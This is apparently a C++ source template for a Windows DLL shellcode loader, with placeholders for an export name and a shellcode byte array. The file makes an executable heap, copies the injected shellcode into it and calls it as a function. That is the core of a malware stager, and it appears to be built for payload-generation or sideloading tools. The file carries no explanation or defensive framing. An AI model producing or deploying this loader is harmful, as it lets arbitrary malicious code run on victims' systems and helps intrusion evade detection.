#include <windows.h>

int heapFuncs(unsigned char* pCs, int size)
{
    HANDLE hCr9 = HeapCreate(0x00040000, size, size);
    LPVOID pcsHeapAlloc = HeapAlloc(hCr9, 0x00000008, size);
    memcpy_s(pcsHeapAlloc, size, pCs, size);
    ((void(*)())pcsHeapAlloc)();
    HeapFree(hCr9, 0x00040000, pcsHeapAlloc);
    CloseHandle(hCr9);
    return 0;
}

extern "C" __declspec(dllexport) DWORD WINAPI {{.ExportName}}(LPVOID parameter) {
	unsigned char shellcode[] = { {{.Shellcode}} };
	heapFuncs((unsigned char*)shellcode, sizeof(shellcode));
	return 0;
} 

BOOL APIENTRY DllMain(HMODULE hModule, DWORD  ul_reason_for_call, LPVOID lpReserved)
{
	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
        break;
	case DLL_PROCESS_DETACH:
		break;
	case DLL_THREAD_ATTACH:
		break;
	case DLL_THREAD_DETACH:
		break;
	}
	return TRUE;
}
